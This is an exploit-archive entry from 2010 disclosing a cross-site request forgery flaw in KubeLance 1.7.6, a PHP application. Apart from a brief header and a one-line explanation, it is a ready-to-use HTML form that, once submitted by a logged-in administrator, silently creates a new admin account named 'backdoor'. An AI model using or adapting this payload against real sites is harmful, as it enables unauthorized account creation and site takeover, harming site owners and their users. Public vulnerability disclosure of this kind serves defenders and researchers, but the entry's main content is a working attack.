[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : KubeLance 1.7.6 (Add Admin) CSRF Vulnerability
# Published : 2010-02-03
# Author : Milos Zivanovic
# Previous Title : ManageEngine OpUtils 5 "Login.DO" SQL Injection Vulnerability
# Next Title : PHP Car Rental-Script (Auth Bypass) SQL Injection
[#-----------------------------------------------------------------------------------------------#]
[#] Title: KubeLance 1.7.6 (Add Admin) CSRF Vulnerability
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail[dot]com
[#] Date: 02. February 2010.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: KubeLance
[#] Version: 1.7.6
[#] Platform: PHP
[#] Link: http://www.kubelabs.com/kubelance/
[#] Price: 90 $
[#] Vulnerability: Cross Site Request Forgery (Add Admin Exploit)
[#-----------------------------------------------------------------------------------------------#]
KubeLance script lack of cross site request forgery protection, allowing us to make exploit and add new admin user.
[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/kubelance/adm/admin_add.php" method="post">
<input type="hidden" name="username" value="backdoor">
<input type="hidden" name="password" value="another-admin-added">
<input type="submit" name="submit">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]
[#]EOF